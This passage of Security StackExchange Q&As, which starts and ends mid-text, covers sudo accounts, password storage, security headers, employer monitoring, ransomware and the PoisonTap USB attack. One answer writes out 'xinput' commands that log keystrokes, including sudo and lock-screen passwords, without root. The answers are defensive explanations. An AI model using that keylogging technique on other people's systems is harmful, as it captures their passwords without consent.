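    ExtensionOID.AUTHORITY_INFORMATION_ACCESS).value
for desc in aia:
    if desc.access_method == AuthorityInformationAccessOID.OCSP:
        print("OCSP responder:", desc.access_location.value)

try:
    crl = cert.extensions.get_extension_for_oid(
        ExtensionOID.CRL_DISTRIBUTION_POINTS).value
    for point in crl:
        for name in point.full_name or []:
            print("CRL:", name.value)
except x509.ExtensionNotFound:
    pass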
{ "source": [ "https://security.stackexchange.com/questions/141311", "https://security.stackexchange.com", "https://security.stackexchange.com/users/69750/" ] }
141,413
Should the sole user of a *nix (particularly Linux and MacOS) have two accounts, one with sudo privileges and one without? Years ago I read that on your personal computer you should do your daily tasks as an unprivileged user and switch to a privileged user for administration tasks. Is this true? Note: I am not referring to whether or not you should log in as root for daily use. That's obviously a bad idea, but should your daily use account be able to use sudo? Second note: I am specifically referring to personal devices that are not being used as servers or to host any functionality for remote users.
Updated dramatically after 69 upvotes, see answer history for original answer. Thanks to @JimmyJames for the discussion . First, let's talk about threat model: what are you trying to stop the potential attacker from doing? Threat model: identity theft / ransomeware on a single-user system Generally for end-user systems the de facto threat model is identity theft / ransomware. If the attacker has access to your documents and/or can run shell commands as you, it's game over. From that perspective, root access doesn't gain the attacker anything; they can get what they want without it. If identity theft / malware is the only thing you're worried about, then it doesn't seem like it matters much whether your user has sudo powers, or ever whether the browser is running as root. (I should also point out that malware / connecting you to a botnet can happen without root access since login scripts / scheduling a cron job does not require root). Randall Munroe at XKCD seems to agree with this view : Lastly, I'll add this disclaimer: Yes, I'm aware that this goes against the general public opinion that "more security is always better". It's just not true. Sometimes more security is worse, like overly complex password policies that end up forcing people to write down their passwords. You always have to look at the risks and decide how much security is actually appropriate. In this case there's no harm to locking down root access, but you are making your life more complicated and it's not clear that you're gaining anything from it. Threat model: root access or multi-user system If you have a threat model where the attacker wants something that only root has access to, or there is more than one user account on the machine, then the answer actually depends on which *nix you're talking about. This is quickly getting away from personal computer cases and into server cases, but I'll discuss anyway. For linux, because of a bug (*ahem feature*) in the Xorg windowing system, your everyday account should probably not have sudo powers. For operating systems that don't use X, it's probably ok. Linux (running X.org window system) Here's a great article that shows you how to log all keystrokes on a gui linux machine using a simple user-land (non-root) shell command. In summary: $ xinput list shows you all connected human-input devices $ xinput test <id> starts echoing all keystrokes on the selected device. I tested and I get logs of the password that I type into sudo in a different terminal window. If I lock my computer then when I log back in, I see logs of the password I typed into the lock screen. Apparently this is not a bug in X, it's a feature. Right, I'm gonna go hide under my bed now. So yeah, this supports the idea that any user you log into in the gui with should not have sudo powers because it's trivial to log your password and then become root. I suppose you should have a dedicated account for sudo ing and switch to a TTY terminal ( ctrl+alt+# ) when you want to use sudo . Whether or not this is worth worrying about is up to you: personally, all the data I care about is already there in my user account, but I probably will change my laptop setup because I'm a security nerd. Note that in my tests I was not able to keylog across users. Doing "Switch Account" in the gui, or startx in a new tty terminal seems to launch an isolated instance of X. 
Thanks to @MichaelKjörling for this observation: That's one of the things that Wayland [windowing system designed to replace X] actually tries to fix (see the bullet point on security). Remember that X11 originated at a time when the threat model was hugely different from what it is today. For sysadmins : this reinforces the habit of only interacting with your Linux boxes over ssh, never use the GUI. Mac OSX I'm not an OSX expert, but I know that it does not use the Xorg server so I would assume that Apple's GUI handles this properly, but I would love for someone more expert than me to weigh in. Windows I'm not a Windows expert either, but I believe that the User Account Control (UAC) feature introduced in Windows 7 addressed this by having admin prompts render in a secure desktop whose input busses are isolated from your regular desktop.
{ "source": [ "https://security.stackexchange.com/questions/141413", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129232/" ] }
141,545
Two input authentication uses both username (may be available publicly) and password (kept secret). For the sake of comparison, assume the length of username is the same as the length of password, i.e., n characters. Also assume we can only use case insensitive letters from a to z. If both username and password are kept secret then at most we need 26^(2n) trials to pass the authentication. Now consider a new authentication system with only one single input, i.e., password that is kept secret of length 2n . The allowed characters are case insensitive, spanned from a to z. This system also needs 26^(2n) trials to be passed. Questions Why don't we use single input authentication?
When signing up for a service, you have a good chance of getting "This name is already in use, choose another" - or something to that effect. In the system you propose, this would tell you that the access code is in use - great, open a new browser and log in with this access code! You've just hijacked somebody else's account. You could find any number of existing access codes, just by trying to change your own. Also, what if you forgot your access code? This can be mitigated if the system knows your e-mail address and can send you a new access code, but then you'd be close to a two-input authentication; you might as well use your e-mail to log in then.
{ "source": [ "https://security.stackexchange.com/questions/141545", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129390/" ] }
141,701
When ransomware searches the victim's files in scanning step, how can ransomware know the types of files? It can check the file name (e.g. book.pdf ) or file signatures. What I'm wondering is when I change the extension in my file's name (say, book.pdf --> book.customEX ), I think that ransomware should not be able to find my files, so encrypting files also cannot be done. Can I have some opinions or advice?
First off, not all ransomware are created equal: just like any software, some ransomware is well-written, while some are poorly-written. You can get an overview of major ransomware variants on wikipedia/ransomware . Some ransomware - notably CryptoLocker - do use lists of file extensions to decide which files to encrypt, and why not? Users knowledgeable enough to change their file extensions probably have backups and won't pay you anyway. As @usr points out, you can still get a lot of people with simple approaches. That said, some ransomware, like CryptoWall, is very sophisticated, and while I don't know how it works, I can speculate on what's possible. As you say, files often contain a "file signature" - a short hex code near the start of the file that indicates what type of file it is. Here are two lists of these "magic numbers" from Wikipedia: [1] , [2] . The Windows OS itself relies quite heavily on file extensions in the file name and is notoriously brittle if you change it, but that doesn't mean all software needs to be so terrible. For example, there's a standard Unix utility called file that will look at the magic number and tell you what type of file it is, there's no reason ransomware can't do the same.
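To illustrate the magic-number idea, here is a small Python sketch of extension-independent detection - the same principle the file utility uses (the signature list is deliberately abbreviated):

# Abbreviated signature table; the real `file` utility knows thousands of these.
SIGNATURES = {
    b"%PDF":               "PDF document",
    b"\x89PNG\r\n\x1a\n":  "PNG image",
    b"\xff\xd8\xff":       "JPEG image",
    b"PK\x03\x04":         "ZIP container (docx/xlsx/jar/...)",
}

def identify(path: str) -> str:
    with open(path, "rb") as f:
        head = f.read(16)
    for magic, kind in SIGNATURES.items():
        if head.startswith(magic):
            return kind
    return "unknown"

# identify("book.customEX") still reports "PDF document" if the bytes are a PDF.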
{ "source": [ "https://security.stackexchange.com/questions/141701", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129525/" ] }
141,706
In my personal life, I use KeePassX to generate/store all my passwords. I have seen some people use a password protected OneNote section. Does the password protected OneNote section provide a comparable level of security to KeePass? Or is the password protection a farce?
As far as storage is concerned, I think that any correctly encrypted file will have the same level of security. The problem is that passwords are meant to be used, and dedicated password vaults have more features: (1) the ability to simulate key presses to avoid putting the password in the clipboard, which additionally allows using them on poorly designed websites that disallow pasting into the password field; (2) even if the clipboard is used, it is cleared after a short time to prevent the password from being inadvertently pasted in the wrong place; (3) some password managers include a password generator (KeePass does) able to generate random passwords with high entropy, resistant to dictionary attacks. For all those reasons, I think that a good password manager is better than a simple encrypted file, even if the crypto engines are equivalent.
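For illustration, the kind of generator a password manager provides can be approximated in a few lines of Python using the secrets module:

import secrets
import string

def generate_password(length: int = 24) -> str:
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))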
{ "source": [ "https://security.stackexchange.com/questions/141706", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129534/" ] }
141,812
Websites like Amazon and eBay sell USB data cables for a pittance, often of unknown or dubious provenance. Should I be wary of using these cables to transfer data to or from my devices? Is it possible (and plausible) that they have a malicious payload that can compromise the security of the host device?
Do you have reason to expect targeted attacks? It's reasonable to assume that random cheap cables sold at large scale generally aren't modified to include offensive hardware, mostly for two reasons: That would raise the cost of the cable far above its price, and would be uneconomical even considering the ability to "monetize" a certain number of random untargeted computers compromised by the attack, so there are no good economic reasons for attackers to do this. We would have noticed such an attack. While most people wouldn't notice, if this was a mass attack, there would reasonably be some detection of that. Malware that tries to randomly hack many, many computers has obvious problems staying undetected for long. However, if you have some reason to expect targeted, expensive attacks aimed at compromising you, mounted by people who have no qualms about performing illegal actions, then it certainly is a possibility that the hardware you receive is "special". That said, this is not limited in any way to cheap USB data cables, or to USB data cables at all - reasonably similar attacks would apply to any device you purchase in the same way, from mice/keyboards to laptops or server hardware. How do you know that your computer didn't have a hardware / firmware backdoor installed when you bought it? If you have reason to expect such risks, you have to treat your USB data cable purchases in a similar manner as all other sensitive hardware; for example, ensure that you buy an item that cannot possibly be "adjusted" especially for you, e.g. a random purchase of a generic item from a store shelf instead of a remote order that will be mailed to your address.
{ "source": [ "https://security.stackexchange.com/questions/141812", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4731/" ] }
141,868
So far as I know, password boxes and PINs are always obscured in some way in order to prevent people from looking over your shoulder when you enter it. However, other important information that I type into a web form (credit card number, social security number, etc.) that I would also like to protect from rubbernecking is hardly ever obscured. As a concrete example typing your login password into Steam or Amazon is properly blanked out but typing in your credit card number when making a purchase is revealed as plaintext. Intuitively, it feels like you would want to blank anything that could be stolen, credit card info included. Is there any particular reason why only passwords and no other sensitive data is usually obscured?
I don't think this is about secret vs sensitive information, eg "secret information is masked and sensitive isn't" (the distinction is problematic; many secrets need to be shared too). I think cc and ssn information isn't blanked for several reasons. These aren't hard facts, but here are a few: 1. Doing what everybody else is doing, not surprising the user. Passwords came long before web forms and were already masked. So when they were used in login forms, they were masked too. When online business and administration came along, prior art (paper forms) required unmasked entry of sensitive information (obviously), so web forms made the same choice. 2. It would be very easy to make a mistake and enter a wrong number if you didn't see what you typed. In the case of a wrong password, this is only mildly annoying and you get instant feedback; in the case of other wrong sensitive data, this might have further consequences which aren't immediately clear (such as a request to a government office being denied because of a wrong SSN or a payment not going through - although in the cc and ssn cases, this is usually hedged against by checking whether the checksum is right and providing immediate feedback if it wasn't). 3. Many people don't know their cc number from memory and copy it from the actual credit card. So the number is there to be seen by a bystander anyway; blanking the entry field wouldn't help much to protect the number at the client end and thus doesn't merit the additional difficulties caused by 2. 4. Impact - A stolen cc number doesn't necessarily have the same impact as a stolen password, especially if you consider that information stolen by looking over your shoulder would most likely be stolen by people who know you (colleagues at work, family members, classmates etc) and want your password for a very specific reason that would have personal consequences. OTOH, even if they were interested in your cc number, you wouldn't have to take the financial damage because the cc company would probably cover it. For the same reason, you don't mind letting a waiter or store clerk see your credit card, even though he could copy it and sell it to someone else... Number 4 may not apply to other kinds of sensitive information, though.
{ "source": [ "https://security.stackexchange.com/questions/141868", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126240/" ] }
141,925
How do I trust that I am typing my password for Google when I'm using a Safari web view in an any iOS app?
How do I trust that I am typing my password for Google? You do not. Apps should allow you to do that through the actual Safari browser in another window, where you can see the address bar.
{ "source": [ "https://security.stackexchange.com/questions/141925", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80238/" ] }
142,110
I'm working on a small side project which involves a browser add-on and a backend service. The service is pretty simple. Give it a URL and it will check if the URL exists in a database. If the URL is found some additional information is also returned. The browser add-on forwards any URLs that the user opens to the service and checks the response. Now, sharing every URL you're browsing is of course a big no-no. So instead, I was thinking about using SHA1 (or similar hashing function) to create a hash of the URL, and only send that to the backend service to check for membership in the DB. My question is whether this scheme is better for the users privacy. My thinking is that now I'm not sharing any URLs, and the only way I know the user has opened a given URL is if it's already present in the database.
It's better but not perfect. While it is (currently) impossible to recover the URL from a given hash, a given URL of course always produces the same hash. So while it is not possible to see every URL a user browses, it is quite likely that most of them can be worked out. It isn't possible to see that user A visits HASH1 and conclude that HASH1 means fancyDomainBelongingToUserA-NoOneElseVisits.com, but it is, for example, possible to just calculate the hash for CheatOnMyWife.fancytld and then see which users visit that site. I wouldn't consider that to be protecting the users' privacy. Also, just matching users who visit a lot of similar domains can be pretty revealing.
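A short sketch of why this matters: anyone holding the hashes can precompute hashes for a list of interesting URLs and match them against whatever the add-on submits (SHA-256 is used here purely as an example; the URLs are made up):

import hashlib

def url_hash(url: str) -> str:
    return hashlib.sha256(url.encode("utf-8")).hexdigest()

# An attacker precomputes hashes for URLs they care about...
candidates = ["https://example.com/", "https://cheatonmywife.example/"]
lookup = {url_hash(u): u for u in candidates}

# ...and matches them against whatever the add-on submits.
submitted = url_hash("https://cheatonmywife.example/")
print(lookup.get(submitted, "unknown"))   # the visited URL is recovered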
{ "source": [ "https://security.stackexchange.com/questions/142110", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129951/" ] }
142,127
I'd like to ask what should be considered a satisfactory result of a pen-testing job. My main concern is that pen-testing is hard and it won't always result in gaining remote shells or root access. However, it is much easier to list potential vulnerabilities. For example, if there's PHP version 4 from 2007, I can list it as a potential vector but I may be unable to exploit it. Is successful exploitation a requirement for a pen-testing job? Would a vulnerability scan be a good result of the job as well, if some successful exploitation is included (but it accounts for less than 1% of all possible issues)?
As someone who contracts pen-testers more than I act as a pen-tester, what I'm looking for is that you did more than run Nessus/ZAP/Burp - I can do that myself (though I expect that you do that as well). I expect you watch the dataflows in the app/website and look for those loose threads that indicate there is a logic error that might be exploitable. I expect that you are able to tell me what you can glean from the outside, that you can tell me things that cause concern that couldn't be found with a scan. I'm looking for indications that you looked at, for instance, password reset screens and considered whether the flow is exploitable. I want to see that you've considered whether privileged information is available to unprivileged users (ie, is the app just using css to hide it or something daft like that). Ideally, I've done the easy stuff before I contract you - I've done the scan, I've done the patches and I've picked all the low-hanging fruit. I hire a pen-tester for the hard stuff. Really, if you don't manage an exploit, I want to see that you've worn your fingernails down scratching at the outside looking for a crack.
{ "source": [ "https://security.stackexchange.com/questions/142127", "https://security.stackexchange.com", "https://security.stackexchange.com/users/117212/" ] }
142,237
Occasionally (though rarely), some of our users say that their password doesn't work: they say that they have typed the correct password but got the 'wrong password' message. We tell them to use the reset password feature, which they do, but they stay with that feeling that the authentication system sometimes doesn't work . Our guess is that their password is not what they remember, but since we don't store it in plain text, do we have any way to prove that's the case? On some occasions we were able to show them that on a certain date they had changed their password and then forgot about it, and they were satisfied. But that's not always the case.
There's not a really quick way to prove this because the hash is designed not to be reversible. You could take their claimed password, and manually generate the hash as @TechTreeDev suggested. You should be using a salted hash (i.e. BCrypt) so make sure you use the same salt. If the manually generated hash matches, then you've proved an issue in the login code. More likely the generated hash will be different, then you've ruled out login code issues, but there still could be an issue with the password setup, or a mistake in your manual generation. That's pretty much the extent of what you can do to check a single person's password. Beyond that we get into system testing. If you suspect an intermittent/random chance edge case, you could create a monkey test script to set up passwords and then try them. This approach is probably overkill though. The best thing is to review your login code and all points that reset the password. The code should be as short and concise as possible. In my experience, the best way to rule out edge case issues is with code review, as such edge cases are often not covered by manual testing. A few things to specifically look for: Make sure that maxlength setting is consistent (or better yet, not present) on any password <input>s. You are looking for consistency between password setup and the login form. Make sure there is no server-side truncation. Make sure that encoding is consistent. If a non-ASCII character is used in the password, the password setup form and login forms need to behave exactly the same. Also don't automatically strip anything like whitespace or non-ASCII characters from the password. This is the kind of thing you can easily catch with a code review if your code is concise. Finally some human tips: Verify they are using the correct username first. Check the caps lock setting is correct. Give the customer support folks a log of every date/time of login or of password reset. If there has been at least one login since the last reset then they know the system worked correctly. As long as the login code is unchanged, and the hash is unchanged since last success, then you can be reasonably certain that the issue must be a mis-typed password. Review the UX of the Wrong Password error, providing the user with some simple tips and an authoritative explanation of possibilities. This may reduce call-ins to customer service. It may be helpful to email notify the customer when a password is reset to remind them. (or other family member in case of shared accounts)
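As a sketch of that manual check, assuming the passwords are stored with bcrypt (where the salt is embedded in the stored value), the comparison boils down to a few lines of Python:

import bcrypt

# Stand-in for the hash value you would copy from the production database.
stored_hash = bcrypt.hashpw(b"the real password", bcrypt.gensalt())

claimed = "what the user says they have been typing"

if bcrypt.checkpw(claimed.encode("utf-8"), stored_hash):
    print("Hashes match: suspect a problem in the login code itself.")
else:
    print("No match: the claimed password differs from what was stored "
          "(or the manual check itself was done differently).")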
{ "source": [ "https://security.stackexchange.com/questions/142237", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83914/" ] }
142,385
A website "broke" after I changed my password to something like "NÌÿÖÏï£Ø¥üQ¢¨¼Ü9¨ÝIÇÅbÍm". I was unable to log in, and customer service deleted my account and had me create a new one. Does this imply security flaws in the site's code? Should I worry about my credentials? Obviously I'm using a password manager, and the website only allows me to reserve seats in a cinema, so the credentials are not of much value.
Your description suggests that the site fails to properly validate its input. This (weakly) implies a deep flaw in their code. If your input had simply choked their routine that calls PBKDF2(), then your password hash might not have been reproducible; but I would expect a simple password reset should have been adequate to clear up that problem. Deleting your account might indicate that your account record was corrupt; however, deleting accounts might simply be their response to anyone who has a password problem due to unexpected user input. They might even be trying to actively thwart hackers with this response.

Also, flawed doesn't necessarily mean their site is vulnerable. The defective code would need to be exploitable, and you didn't supply evidence of that. Such evidence might include erratic behavior or inexplicably changed values. If you decide to press further, perhaps testing individual password characters to isolate the glyph that caused their site to lock your account, know that they would be within their rights to consider those attempts to be a hacking attack. Seek the site owner's permission before experimenting.

Note that if instead of using high-bit-set characters, you construct your password from 16 cryptographically random, high-bit-unset, standard, ordinary, printable ASCII alphanumeric characters, the practical difference to your password's security will be irrelevant.
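One plausible failure mode behind a password like this is inconsistent character encoding between the form that set the password and the form that checks it. The sketch below is purely illustrative, not a claim about that particular site: it just shows that the same high-bit-set password hashed after UTF-8 versus Latin-1 encoding produces unrelated digests (plain SHA-256 is used only to keep the example short; a real site should use a dedicated password hash such as bcrypt or PBKDF2):

```python
# Illustrative only: the same non-ASCII password, encoded two different ways,
# yields two unrelated hashes -- one way a "correct" password can stop working.
import hashlib

password = "NÌÿÖÏï£Ø¥üQ¢¨¼Ü9¨ÝIÇÅbÍm"

utf8_digest   = hashlib.sha256(password.encode("utf-8")).hexdigest()
latin1_digest = hashlib.sha256(password.encode("latin-1")).hexdigest()

print(utf8_digest)
print(latin1_digest)
print(utf8_digest == latin1_digest)  # False: signup and login must agree on encoding
```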
{ "source": [ "https://security.stackexchange.com/questions/142385", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92207/" ] }
142,496
I have a static web site. Users cannot log in or perform any other actions. Which of the common HTTP security measures make sense for my site? Do I need any of these?

- HTTPS
- Strict transport security
- Content security policy
- Certificate pinning
- Clickjacking protection
- Content sniffing protection
The common web application attack vectors don't apply to a strictly static website. Without interactive elements there are no accounts to hijack or cookies to steal. Nonetheless, you should provide your visitors with encrypted access - even if you're not hosting delicate content.

TL;DR: Use HTTPS with HSTS to ensure some degree of privacy and the integrity of your content to visitors. Adding HPKP to a static site might be unnecessarily paranoid and you have to be careful when deploying it. The other discussed security measures are mostly irrelevant for a static site, but they are so simple to implement that you might still decide to use them.

## HTTPS

Yes, do it. With free SSL certificate providers like Let's Encrypt you need a very good reason not to switch. HTTPS protects the privacy and integrity of the transmitted data, which is desirable even with static content.

Scenario for an integrity violation: If you offer downloads, a man-in-the-middle attacker could tamper with the files to deliver malware. Example of a privacy violation: My employer, the owner of the WiFi hotspot I'm connected to, or my ISP could all see which exact articles I'm reading and content I'm downloading from your site. With HTTPS, however, I would mostly expose metadata (the IP address I'm connected to, the hostname due to SNI, etc.).

## HTTP Strict Transport Security

Yes, do it. HSTS helps to enforce that users only use HTTPS to connect to your website, thereby preventing SSL stripping attacks. If you roll out HTTPS, it makes a lot of sense to follow up with HSTS. It's easily implemented by adding an additional response header, like this:

    Strict-Transport-Security: max-age=31536000

Since HSTS only takes effect from the first time a user encounters the header (TOFU model) and until the max-age timeout is reached, you might even want to submit your site to the HSTS preload list. This has the effect that users will start connecting via HTTPS from their very first visit. Be aware that it's troublesome to switch back to plain HTTP after enabling HSTS.

## HTTP Public Key Pinning ("Certificate Pinning")

It depends. While HSTS tells the browser to strictly use HTTPS for a given time, an HPKP header specifies which certificates the browser should trust in the future. Pinning public keys from the certificate chain protects users against an attacker replacing your certificate with a rogue one. Such an attack is very unlikely since the adversary would need to compromise a CA to be able to issue rogue certificates (although that has happened before). Additionally, you have to be careful when setting up HPKP since a defective deployment could make your site unavailable to previous users. Detectify Labs have an excellent article on HPKP with a more optimistic conclusion:

> So should you use HPKP? Yes, you should. If you pin correctly, the chance of everything going south is pretty small.

## Content Security Policy

Yes, but you might not really need it. The CSP was created to mitigate XSS and related attacks by limiting which resource type from which origin is allowed to be loaded by your site. Since you have a purely static website and probably don't embed external sources at all, it might not be an actual attack vector. A sensible policy would depend on which kind of resources you are loading. For example, this restrictive policy header only allows content from the same origin:

    Content-Security-Policy: default-src 'self'

## Clickjacking protection

Yes, why not. Clickjacking attacks trick a user into unwittingly interacting with your website through a disguised frame. If you have no interactive elements, however, there is no actual damage to be done. (In a better world cross-origin frames would be an opt-in feature, though.) The implementation is straightforward. This example disallows any frame embedding at all:

    X-Frame-Options: Deny

Note that the XFO header has been declared obsolete in favor of the frame-ancestors CSP directive:

    Content-Security-Policy: frame-ancestors 'none'

## Content sniffing protection

Yes, why not. If you don't correctly declare content types, browsers might guess (sniff) the type (although that behavior has become less common). This is particularly dangerous with user content that is supposed to be non-executable but determined to be an executable format after sniffing due to a missing content type. With your static site that will hardly become an issue. Just to be safe you could add the following header to prevent sniffing (but it's not a replacement for properly declared MIME types):

    X-Content-Type-Options: nosniff

See also: Does X-Content-Type-Options really prevent content sniffing attacks?

Also have a look at the OWASP Secure Headers Project for more details on security-relevant headers with some real-life examples.
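For a static site served straight from a directory, these headers are normally added in the web server or CDN configuration. Purely to illustrate what the end result looks like, here is a hedged sketch using Python's built-in http.server; the header names and values mirror the examples above, and this is a demo listener, not a production server:

```python
# Demo only: serve a static directory and attach the security headers
# discussed above. Python's http.server is not meant for production use.
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

class SecureHeadersHandler(SimpleHTTPRequestHandler):
    def end_headers(self):
        # Values mirror the examples in the answer; tune max-age/policy to taste.
        self.send_header("Strict-Transport-Security", "max-age=31536000")
        self.send_header("Content-Security-Policy",
                         "default-src 'self'; frame-ancestors 'none'")
        self.send_header("X-Frame-Options", "DENY")
        self.send_header("X-Content-Type-Options", "nosniff")
        super().end_headers()

if __name__ == "__main__":
    # HSTS only makes sense behind a TLS terminator; this listener is plain HTTP.
    ThreadingHTTPServer(("127.0.0.1", 8000), SecureHeadersHandler).serve_forever()
```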
{ "source": [ "https://security.stackexchange.com/questions/142496", "https://security.stackexchange.com", "https://security.stackexchange.com/users/102236/" ] }
142,546
I saw someone's interesting practice for storing sensitive information. He is saving all his thousand logins (including banks and email) in an access-restricted Google spreadsheet, stored on his Google Drive. The link to the document is shortened using some URL shortener and he uses that simple-to-remember link to open the document every time he needs a specific password or an account number. His argument is that the practice is secure enough because:

- The document is on his personal Google Drive, protected by Google against external attacks. So the location is more secure than e.g. his PC.
- Access to the document needs a Google login, which is protected by Google's 2-step verification.
- The URL to that document is not known to anyone else except himself, his browser, and the shortener service, all of whom cannot access the document without login details. The rest of the world doesn't know the location/URL.
- He opens the document only on his PC, laptop, and mobile.

The information in such a document is everything that someone needs to impersonate him, and I don't think this method is so foolproof. Can someone explain, technically, how secure this practice is? Can you suggest an alternative as easy as typing a URL every time he needs to recall a password?

P.S. I am impressed, at first sight, with these two professional utilities (password managers) dedicated to this purpose, which I came to know of from the answers below: KeePass and LastPass (any others?). While both seem to be cost-free, the first is preferable to me for being open-source -- I am going to give it a try. Mentioning efficient alternatives (esp. ones as easy as the short URL above) like this will be the most important take-away from this post. For me, in spite of having heard about password managers many times, I never really focused on them.
When thinking about security, you must be able to say:

- what threat you want to address
- what attacker you want to be protected from

and then review the possible weaknesses. A restricted-access file on a well-configured Google Drive is correctly protected from all attacks from the guy next door. As you say that the Google account is 2-step secured, someone who cannot guess how to log in cannot access the file... provided you are fully confident in Google!

And here come the weaknesses:

- As the file has only restricted access, any Google employee with admin privileges can read it - do you know how many of them exist?
- Google is a firm well known for technical excellence, so the risk that it is hacked is reasonably low. But what if a fired employee decides to make files from Google Drive public as revenge, simply because it would be bad for Google's reputation?
- Because of the Patriot Act, US law enforcement agencies can access any data from US companies, and Google is one. Whether or not that is a problem is up to you.

For that reason, I would never store passwords in a file that is not securely encrypted. Google Drive is certainly a reasonable repository, but I would rather use a KeePass file there - it can be synchronized from any device - than a mere spreadsheet.
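If the convenience of keeping a file on Google Drive is the main draw, a middle ground is to encrypt the file locally before it ever reaches the drive, so neither an admin nor a subpoena yields plaintext. A dedicated password manager such as KeePass is still the better tool; the sketch below, using the `cryptography` package's Fernet recipe, only shows how little code client-side encryption takes. File names and the key-handling shortcut are illustrative assumptions:

```python
# Illustrative sketch: encrypt a local secrets file before uploading it anywhere.
# Requires the `cryptography` package (pip install cryptography).
from cryptography.fernet import Fernet

# In real use, derive or store this key somewhere safer than a plain file.
key = Fernet.generate_key()
fernet = Fernet(key)

with open("passwords.csv", "rb") as f:          # hypothetical local plaintext file
    ciphertext = fernet.encrypt(f.read())

with open("passwords.csv.enc", "wb") as f:      # this is what you would upload
    f.write(ciphertext)

# Later, after downloading the file again:
with open("passwords.csv.enc", "rb") as f:
    plaintext = fernet.decrypt(f.read())
```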
{ "source": [ "https://security.stackexchange.com/questions/142546", "https://security.stackexchange.com", "https://security.stackexchange.com/users/72483/" ] }
142,803
This is an attempt at a canonical question following this discussion on Meta. The aim is to produce basic answers that can be understood by a general audience. Let's say I browse the web and use different apps while connected to the network at work. Can my employer (who controls the network) see what websites I visit, what emails I send, my IM messages, what Spotify songs I listen to, etc.? What are they able to see? Does it matter if I use my own computer, or one provided for me by my employer? Does it matter what programs I use, or what websites I visit?
Yes. Always assume yes. Even if you are not sure, always assume yes. Even if you are sure, they might have a contract with the ISP, a rogue admin who installed a packet logger, a video camera that catches your screen... yes.

Everything you do at the workplace is visible to everyone. Especially everything you do on digital media. Especially personal things. Especially things you would not want them to see.

One of the basic rules of Information Security is that whoever has physical access to the machine has the machine. Your employer has physical access to everything: the machine, the network, the infrastructure. They can add and change policies, install certificates, play man in the middle. Even websites with 'SSL' can be intercepted. There are plenty of valid reasons for this, mostly related to their own network security (antivirus, logging, prohibiting access to certain sites or functionalities).

Even if you get lucky and they cannot see the contents of your messages, they might still be able to see a lot of other things: how many connections you made, to which sites, how much data you sent, at what times... even when using your own device, even using a secure connection, network logs can be pretty revealing.

Please, when you are at work, or using a work computer, or even using your own computer on the company network: always assume everything you do can be seen by your employer.
{ "source": [ "https://security.stackexchange.com/questions/142803", "https://security.stackexchange.com", "https://security.stackexchange.com/users/111078/" ] }
142,863
Wouldn't it be smarter to measure password entropy and reject low-entropy passwords? This would allow short passwords using the whole character set to pass, as well as long passwords only using parts of the character set. Is the above scheme possible, or do implementation details prevent something like this from being done? Does any site or program already incorporate such password requirements?
After the famous XKCD strip, there were a few projects started up to deal with exactly this kind of entropy checking. One of these was the ZXCVBN password checker, made by a Dropbox employee. It is possibly the most thorough password checker of its kind. It checks for patterns, words, and more, adding to (or subtracting from) an entropy score accordingly. It is explained in detail on their blog.
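zxcvbn has been ported to many languages; assuming the Python port (pip install zxcvbn) keeps the same interface as the original JavaScript library, an entropy-style check looks roughly like this. The minimum score threshold (0-4) is a policy choice, not something the library dictates, and the example passwords are placeholders:

```python
# Rough sketch of a zxcvbn-based password policy (assumes the Python port of zxcvbn).
from zxcvbn import zxcvbn

def password_acceptable(password: str, user_inputs=None, min_score: int = 3) -> bool:
    # user_inputs lets the estimator penalise the user's own name/email etc.
    result = zxcvbn(password, user_inputs=user_inputs or [])
    return result["score"] >= min_score   # score ranges 0 (terrible) .. 4 (strong)

print(password_acceptable("Tr0ub4dor&3"))                 # likely False
print(password_acceptable("marmot undertow calypso bike"))  # likely True
```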
{ "source": [ "https://security.stackexchange.com/questions/142863", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77793/" ] }
142,879
I just heard of PoisonTap today. Here is a short description from a TechCrunch article:

> PoisonTap connects to the USB port and announces itself not as a USB device, but an Ethernet interface. The computer, glad to switch over from battery-sucking Wi-Fi, sends a DHCP request, asking to be assigned an IP. PoisonTap responds, but in doing so makes it appear that a huge range of IPs are not in fact out there on servers but locally connected on the LAN, through this faux wired connection. And you don’t even have to be there: pre-loaded items like analytics and ads will be active, and as soon as one of them sends an HTTP request — BAM, PoisonTap responds with a barrage of data-caching malicious iframes for the top million Alexa sites. And those iframes, equipped with back doors, stick around until someone clears them out.

This sounds quite worrisome, yet I have not heard much about it yet. So my main question is: how vulnerable are people to the PoisonTap hack? It seems like the following points would be relevant:

- Is the general population at risk, or only a very specific subset (OS, browser)?
- What exactly is at risk: your data, your Gmail account...?
- Is it something that most people can pull off, or does it depend on specific hardware and a high level of skill?
- Is there something that one can do easily, without closing all browsers or turning off the PC each time you walk to a different room to ask a short question? (Is locking it sufficient?)

And of course, if it is as bad as it seems: can we expect updates soon that would make it safer to go to the toilet again?
First, the attacker needs to have physical access to the machine in order to plug the device into the USB port. This means any kind of full remote exploit is not possible. It does work, though, if the computer screen is locked with a password or similar. Note that the physical access does not need to be direct, i.e. it can also be some gullible user plugging a donated USB stick into the system.

Then the device announces itself as a USB Ethernet device. This means that the computer will try to add PoisonTap as a network device to the system and get an IP address from it using DHCP. The DHCP response will return an IP address with a /1 subnet so that most IPv4 traffic is sent to the device. From then on the attacker has the same kind of access as a router: in fact the device works as a router for the attacked computer. This means that any traffic can be easily sniffed and modified, but encrypted connections are still protected against decryption and modifications get detected. This means, for example, that access to Gmail over HTTPS (the usual way) will not be compromised.

In the end it is just another attack vector for a local attacker. The impact of the attack is comparable to redirecting someone's traffic via ARP or DHCP spoofing, hijacking the local router, or a rogue access point. Nothing more can be done than with these attacks, but also nothing less. It looks like the software comes with some nice attacks which modify unencrypted HTTP connections to access different sites in order to poison the browser's cache with heavily used scripts (like a poisoned Google Analytics, etc.). Since many sites include such third-party code and such code gets access to the full page, poisoned code can extract lots of useful information. But again, this works only for HTTP, not HTTPS.

> Is the general population at risk, or only a very specific subset (OS, browser)?

Most current systems are at risk, but the attacker needs physical access.

> What exactly is at risk, your data, your Gmail account...?

